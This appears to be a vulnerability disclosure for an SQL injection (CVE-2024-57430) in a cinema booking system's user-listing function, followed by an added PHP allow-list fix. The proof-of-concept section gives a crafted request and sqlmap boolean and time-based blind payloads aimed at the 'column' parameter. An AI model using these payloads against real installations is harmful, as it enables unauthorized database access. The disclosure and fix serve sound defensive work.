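Related vulnerability
Title:
N/A
(CVE-2024-57430)
Description: An SQL injection vulnerability in the pjActionGetUser function of PHPJabbers Cinema Booking System v2.0 allows attackers to manipulate database queries via the column parameter. Exploiting this vulnerability can lead to unauthorized information disclosure, privilege escalation, or database manipulation.
Description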
CVE-2024-57430: PHPJabbers Cinema Booking System v2.0 is vulnerable to SQL injection, leading to unauthorized data access and privilege escalation.
Introduction
# CVE-2024-57430
An SQL injection vulnerability in the pjActionGetUser function of PHPJabbers Cinema Booking System v2.0 allows attackers to manipulate database queries via the column parameter. Exploiting this flaw can lead to unauthorized information disclosure, privilege escalation, or database manipulation.
Vulnerable Parameter: ```column```
## Impact:
SQL injection can lead to unauthorized access to sensitive information, database modification, and even full compromise of the database server. This poses a critical threat to the confidentiality, integrity, and availability of the application.
## Exploit - Proof of Concept (POC)
### SQL Injection
GET Request on URL: ```http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=*&&direction=ASC&page=1&rowCount=10```
### SQLMAP on column
```
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name RLIKE (SELECT (CASE WHEN (7874=7874) THEN 0x6e616d65 ELSE 0x28 END))&direction=ASC&page=1&rowCount=10
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name AND (SELECT 6530 FROM (SELECT(SLEEP(5)))UFOj)&direction=ASC&page=1&rowCount=10
```
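One way to close this class of injection point, shown as an added example that is not part of the original README or of PHPJabbers' code. It assumes `column` and `direction` end up in the sort clause of the user-list query; the function name `buildOrderClause` and the column names in the allow-list are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical allow-list: accepted request value => real column identifier.
const SORT_COLUMNS = [
    'id'      => 'id',
    'name'    => 'name',
    'email'   => 'email',
    'created' => 'created',
];

/**
 * Build the ORDER BY / LIMIT clause from untrusted request parameters.
 * Identifiers cannot be bound as prepared-statement parameters, so the
 * column is looked up in an allow-list and never copied from the request.
 */
function buildOrderClause(array $query): string
{
    $column = $query['column'] ?? 'id';
    if (!is_string($column) || !array_key_exists($column, SORT_COLUMNS)) {
        throw new InvalidArgumentException('unsupported sort column');
    }

    // Anything other than an exact DESC falls back to ASC.
    $dirRaw = $query['direction'] ?? 'ASC';
    $direction = (is_string($dirRaw) && strtoupper($dirRaw) === 'DESC') ? 'DESC' : 'ASC';

    // Paging values must be bounded integers; arrays and junk yield false.
    $rowCount = filter_var($query['rowCount'] ?? 10, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 100]]);
    $page = filter_var($query['page'] ?? 1, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    if ($rowCount === false || $page === false) {
        throw new InvalidArgumentException('invalid paging value');
    }

    return sprintf('ORDER BY `%s` %s LIMIT %d OFFSET %d',
        SORT_COLUMNS[$column], $direction, $rowCount, ($page - 1) * $rowCount);
}

// Constructed sample requests: a legitimate sort, then the time-based value reported above.
$samples = [
    ['column' => 'name', 'direction' => 'desc', 'page' => '2', 'rowCount' => '10'],
    ['column' => 'name AND (SELECT 6530 FROM (SELECT(SLEEP(5)))UFOj)', 'direction' => 'ASC'],
];
foreach ($samples as $q) {
    try {
        echo buildOrderClause($q), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

Any filter values in the same query should still go through bound parameters; the allow-list only covers the parts of the statement that cannot be bound.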
File snapshot
[4.0K] /data/pocs/a5ab39355b1c4773ffda294b0c85acdbc8799cbe
└── [1.4K] README.md
0 directories, 1 file